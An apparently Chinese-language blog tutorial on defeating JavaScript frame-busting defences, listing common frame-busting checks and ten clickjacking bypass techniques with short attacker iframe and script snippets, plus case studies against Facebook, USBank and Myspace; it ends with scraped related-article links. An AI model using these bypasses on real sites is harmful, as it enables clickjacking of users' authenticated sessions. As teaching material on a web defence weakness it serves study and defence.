Busting Frame Busting
-
在“X-FRAME-OPTIONS”或者“浏览器防御部署”被广泛使用之前,网站防御ClickJacking的唯一方法也只能使用javascript脚本。我们把这样的javascript脚本称为-- Frame Busting,而突破“Frame Busting ”的脚本,则称为Busting Frame Busting。
在进行Busting Frame Busting之前,先列举一些常用的Frame Busting code:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length>0)
if((self.parent&&!(self.parent===self))&&(self.parent.frames.length!=0))+
top.location = self.location
top.location.href = document.location.href
top.location.href = self.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write()
top.location = location
top.location.replace(document.location)
top.location.replace(URL)
top.location.href = document.location
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
top.location.href = self.location
top.location = window.location
top.location.replace(window.location.pathname)
window.top.location = window.self.location
setTimeout(function(){document.body.innerHTML=;},1);
window.self.onload = function(evt){document.body.innerHTML=;}
var url = window.location.href; top.location.replace(url)知道了一些常用的Frame Busting ,下面开始介绍如何进行Busting Frame Busting。
十种常见的Busting Frame Busting
1 Double framing
Victim frame busting code:
if(top.location!=self.location){
parent.location=self.location;
}Attacker top frame:
<iframe src="attacker2.html">
Attacker sub-frame:
<iframe src="http://www.victim.com">2 The onBeforeUnload event
<script>
window.οnbefοreunlοad=function()
{
return"Asking the user nicely";
}
</script>
<iframesrc="http://www.paypal.com">3 onBeforeUnload ---204 Flushing
var prevent_bust=0
window.οnbefοreunlοad=
function(){kill_bust++}
setInterval(function(){
if(kill_bust>0){
kill_bust-=2;
window.top.location=
http://no-content-204.com
}
},1);
<iframe src="http://www.victim.com">4 Exploiting the XSS filter
IE8:
Example. Victim frame busting code:
<script>
if(top!=self){
top.location=self.location;
}
</script>
Attacker:
<iframe src="http://www.victim.com/?v=<script>if>Google Chrome:
Example. victim frame busting code:
if(top!=self){
top.location=self.location;
}
Attacker:
<iframe src="http://www.victim.com/?v=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D">5 Referrer checking problems
Consider the following code from a large retailer:
if(top.location!=location){
if(document.referrer&&document.referrer.indexOf("walmart.com")==-1)
{
top.location.replace(document.location.href);
}
}
This page can be framed by an attacker who controls a domain walmart.com.badgy.com.6 Clobbering top.location
IE7.
Victim frame busting code:if(top.location!=self.location){
top.location=self.location;
}
Attacker:
<script>var location="clobbered";</script>
<iframe src="http://www.victim.com">7 IE Restricted Zone
Attacker:
<iframe src="http://www.victim.com" security="restricted"></iframe>8 Sandbox attribute
This feature can be used to disable JavaScript in the same way as the restricted zone; however, because cookies are delivered in the subframe, clickjacking attacks can take advantage of existing sessions that the user has established.
9 Design modeStone [Next generation clickjacking] showed that design mode can be turned on in the framing page (via document.designMode), disabling JavaScript in top and sub-frame. Again, cookies are delivered to the sub-frame. Design mode is currently implemented in Firefox and IE8.
10 Mobile Sites
Unfortunately, most sites who framebust on their primary domain do not framebust their mobile sites.To make matters worse, many sites do not dierentiate sessions between the regular and the mobile site; that is, if you are logged in at www.example.com you are also logged in at mobile.example.com. This enables the attacker to clickjack the mobile site (on a desktop browser) and gain control of a fully functional site.
实际网络环境中,Busting Frame Busting将会较为复杂。
1 Facebook.com ---Shedding a Ray of Light in the
Darknessframe-busting code:
if(top!=self){
window.document.write("<div style=
background:black;opacity:0.5;
filter:alpha(opacity=50);
position:absolute;top:0px;left:0px;
width:9999px;height:9999px;
z-index:1000001
onClick=top.location.href=window.location.href>
</div>");
}Busting Frame Busting:
<body style="overflo-x:hidden; border:0px; margin:0px;">
<iframe width="21800px" height="2500px" src="http://facebook.com/" frameborder="0" marginheight="0" marginwidth="0"></iframe>
<script>window.scrollTo(10200,0);</script>2 www.USBank.com----Domain checking errors
frame-busting code:
if(self!=top){
var dom=getDom(document.referrer);
var okDom=/usbank|localhost|usbnet/;
var matchDomain=dom.search(okDom);
if(matchDomain==-1){//bust}(www.husbanken.no ,http://www.rusbank.org)will be allowed to frame the page since both contain the string usbank in the domain.
3 Myspace.com----Trust problems
frame-busting code:
try{
A=!top.location.href
}catch(B){}
A=A&&!(document.referrer.match(
/^https?://[-a-z0-9.]*.google.(co.
|com.)?[a-z]+/imgres/i))
&&!(document.referrer.match(
/^https?://([^/]*.)?(myspace.com
|myspace.cn
|simsidekick.com
|levisawards.com//i));
if(A){//framebust}
By design the code allows Myspace to be framed by Google images.Google images, however,does not use frame busting.
an attacker can frame Google images and then cause Google images to frame Myspace (e.g. by issuing a speci c Google search query that leads to a Myspace page)如何防御,如何突破,在上面的描述中都已经看到了。现在给出目前防御性最
Busting Frame Busting相关推荐
- 想要求职Web安全相关的岗位,你就必须要懂的知识
随着互联网的发展,各种Web应用变得越来越复杂,满足了用户的各种需求的同时,各种网络安全问题也接踵而至.作为前端工程师也逃不开这个问题,今天一起看一看Web前端有哪些安全问题以及我们如何去检测和防范这 ...
- Online social networks security and privacy: comprehensive review and analysis 笔记
Introduction 社交网络可以被分为四种板块:社交关系(social connections).多媒体分享(multimedia sharing).专业(professional)和论坛(di ...
- 读《白帽子讲Web安全》之客户端脚本安全(一)
2019独角兽企业重金招聘Python工程师标准>>> [第2章 浏览器安全] 1.同源策略(Same Origin Policy)是一种约定,它是浏览器最核心也最基本的安全功能. ...
- 常见web攻击方式与防御方法
1. 客户端攻击 1.1 跨站脚本攻击(XSS) 跨站脚本攻击(XSS)是客户端脚本安全中的头号大敌.OWASP TOP 10威胁多次把XSS列在榜首. 1.1.1 XSS分类 XSS根据效果的不同可 ...
- WEB页面常见安全问题
1.DOS.DDOS攻击 DOS(Denial of Service),拒绝服务,造成远程服务器拒绝服务的行为,叫做DOS攻击. DOS攻击的目的:使计算机或网络无法提供正常的服务. 常见的DOS攻击 ...
- 读白帽子讲WEB安全,摘要
读<白帽子讲WEB安全>摘要 文章目录 我的安全世界观 安全三要素-CIA 如何实施安全评估 白帽子兵法 客户端安全 浏览器安全 同源策略 浏览器沙箱 恶意网址拦截 高速发展的浏览器安全 ...
- 初中级前端面试复习总结(浏览器、HTTP、前端安全)
浏览器 页面渲染流程 1)字节流解码.浏览器获得字节数据,根据字节编码将字节流解码,转换为代码. 2)输入流预处理.字符数据进行统一格式化. 3)令牌化.从输入流中提取可识别的子串和标记符号.可以理解 ...
- 读书笔记——吴翰清《白帽子讲Web安全》
目录 第一篇 世界观安全 一 我的安全世界观 第二篇 客户端脚本安全 一 浏览器安全 二 跨站脚本攻击(XSS) 三 跨站点请求伪造(CSRF) 四 点击劫持(ClickJacking) 五 HTML ...
- 《白帽子讲Web安全 》 随手记(一)
第一遍阅读这本书是在今年春节,那时读得太匆忙,加上对Web上存在的威胁了解不多,那时并不觉这本书较同类书籍有什么特别之处. 时隔3个月第二次阅读,醍醐灌顶,特别是讲解原理的部分,深入浅出,很好的梳理了 ...
- 《白帽子讲Web安全 》 随手记(二)
第四章 跨站点请求伪造(CSRF) CSRF的中文名是跨站点请求伪造,很多安全工程师不理解它的利用与危害,因此不予重视. 攻击形成的本质是重要操作的所有参数都可以被 ...
最新文章
- 把项目放到码云上,通过git 进行项目管理
- idea 不能粘贴复制问题
- 数据结构与算法JavaScript描述——使用队列
- 【Java 虚拟机原理】Java 类中的类加载初始化细节 ( 只使用类中的常量时加载类不会执行到 ‘初始化‘ 阶段 )
- wpf 控件大小随窗体大小改变而改变
- CNN:测试一下YoloV3
- JAVA实验二——圆柱体
- where is null mysql_SQL中WHERE变量IS NULL条件导致全表扫描问题的解决方法
- python扩展,用python扩展列
- LeetCode刷题(47)--Gray Code
- Observer设计模式中-委托事件-应用在消息在窗体上显示
- sqlserver2000换成mysql_MS SQL Server2000转换成MySQL
- CCF201412-4 最优灌溉(解法二)(100分)【废除!!!】
- matlab中modred,计算机仿真技术(中南大学)3系统模型及转换.ppt
- wpsa3版面怎么变成a4、排版不变_怎么把wpsa3转变成a4
- 2021年5月信息系统项目管理师真题基础知识1~32题
- 【小程序】微信小程序如何获取用户微信openID?(已解决,完整代码实例)
- 360更新补丁之后,程序无法运行解决历程
- java仓库管理系统sql_仓库管理系统 java+sql server
- #SORA#etcd研究